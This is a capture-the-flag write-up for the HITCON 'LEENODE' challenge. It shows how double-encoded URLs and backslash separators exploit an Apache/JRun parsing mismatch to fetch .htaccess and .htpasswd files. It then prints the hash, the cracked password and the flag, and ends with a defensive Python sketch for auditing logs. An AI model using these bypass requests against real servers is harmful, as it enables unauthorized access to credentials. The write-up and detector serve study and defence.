= LEENODE =
 1. Perhaps what we need to do is to access /admin/.
 1. The server was Apache/2.0.65 (Unix) JRun/4.0 Server.
 1. *.jsp was forwarded to the JRun server.
  * http://203.66.57.98/a.jsp
 1. I found vulnerability information for JRun.
  * http://www.kb.cert.org/vuls/id/977440
 1. [[http://203.66.57.98/a;.jsp]] was 500 Internal Server Error. It is interesting. By Apache?
 1. I tried to escape the URL for Apache; [[http://203.66.57.98/a%253b.jsp]] was /a and a 404 Error by JRun. It is very interesting.
 1. Can I get /.htaccess or /admin/.htaccess? [[http://203.66.57.98/.htaccess%253b.jsp]], [[http://203.66.57.98/admin/.htaccess%253b.jsp]]: The answer is no. These are blocked by Apache. We need more tricks.
 1. Then, I found that JRun recognized the backslash as a directory separator (for Windows?). [[http://203.66.57.98/.%5Ca%253b.jsp]] was handled as /a by JRun.
 1. Finally, I got /admin/.htaccess via [[http://203.66.57.98/.%5Cadmin%5C.htaccess%253b.jsp]] and /admin/.htpasswd via [[http://203.66.57.98/.%5Cadmin%5C.htpasswd%253b.jsp]].
 {{{
AuthName "Restricted Area"
AuthType Basic
AuthUserFile /usr/local/apache2/htdocs/admin/.htpasswd
AuthGroupFile /dev/null
require valid-user
 }}}
 {{{
hitc0n_1een0de:nlGc3XNhkrL1o
 }}}
 1. Use John. The password was ktw2z.
 {{{
% john htpasswd
ktw2z (hitc0n_1een0de)
guesses: 1 time: 0:00:01:13 DONE (Sat Aug 16 20:58:25 2014) c/s: 5319K trying: ktkcK - kk4iT
 }}}
 1. The flag was at [[http://203.66.57.98/admin/thefl4g.txt]].
 {{{
The flag is HITCON{u_d0nt_f0rg3t_d0uble_3nc0ding!}
 }}}
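A log-audit sketch for the decoding mismatch in this write-up, flagging request paths that the front end and the back end resolve differently. It is an added example, not part of the original write-up; the back-end model (second percent-decode, cut at `;`, backslash as separator) is an assumption drawn from the behaviour observed above, not JRun's actual code, and the function names are hypothetical.

```python
import posixpath
from urllib.parse import unquote

# Assumption: file names a front-end access rule is expected to block.
PROTECTED = (".htaccess", ".htpasswd")

def frontend_view(raw_path):
    """Path as the front-end server sees it: percent-decoded once."""
    return unquote(raw_path)

def backend_view(raw_path):
    """Modelled back end: decode a second time, cut at ';', treat '\\' as '/'."""
    path = unquote(frontend_view(raw_path))
    path = path.split(";", 1)[0]          # path parameter ends the file name
    path = path.replace("\\", "/")        # backslash accepted as a separator
    return posixpath.normpath(path)

def audit(raw_path):
    """Return the reasons a logged request path should be flagged."""
    reasons = []
    once = frontend_view(raw_path)
    twice = unquote(once)
    if twice != once:
        reasons.append("double-encoded")
    if "\\" in twice:
        reasons.append("backslash-separator")
    back = backend_view(raw_path)
    if posixpath.normpath(once) != back:
        reasons.append("views-differ")
    if posixpath.basename(back) in PROTECTED:
        reasons.append("protected-file")
    return reasons

if __name__ == "__main__":
    # Request paths as they would appear in an access log (taken from the steps above).
    for p in ("/a.jsp", "/a%253b.jsp", "/.%5Cadmin%5C.htaccess%253b.jsp"):
        print(p, "->", backend_view(p), audit(p))
```

Any path with a non-empty result deserves a look; the durable fix is to make both tiers canonicalize identically, or to have the front end reject paths that still contain `%` or `\` after one decode.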